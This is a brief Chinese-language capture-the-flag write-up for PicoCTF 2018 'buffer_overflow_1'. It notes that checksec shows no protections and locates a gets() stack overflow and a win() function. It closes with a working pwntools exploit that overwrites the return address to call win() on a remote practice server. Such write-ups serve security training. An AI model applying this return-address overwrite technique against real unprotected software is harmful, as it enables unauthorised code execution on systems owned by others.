PicoCTF_2018_buffer_overflow_1
使用checksec
查看:
保护机制全关,看起来没啥难度。
扔进IDA中查看:
主函数中给出了漏洞函数,跟进查看:
gets()
函数,栈溢出,s
距离ebp0x28
查看下这题的字符串可以发现函数win()
:
能够直接获取到flag,直接秒了这题。
exp:
from pwn import *
#start
# r = process("../buu/PicoCTF_2018_buffer_overflow_1")
r = remote("node4.buuoj.cn",26126)
#params
win_addr = 0x80485CB
#attack
payload= b'M'*(0x28+4) + p32(win_addr)
r.recv()
r.sendline(payload)
r.interactive()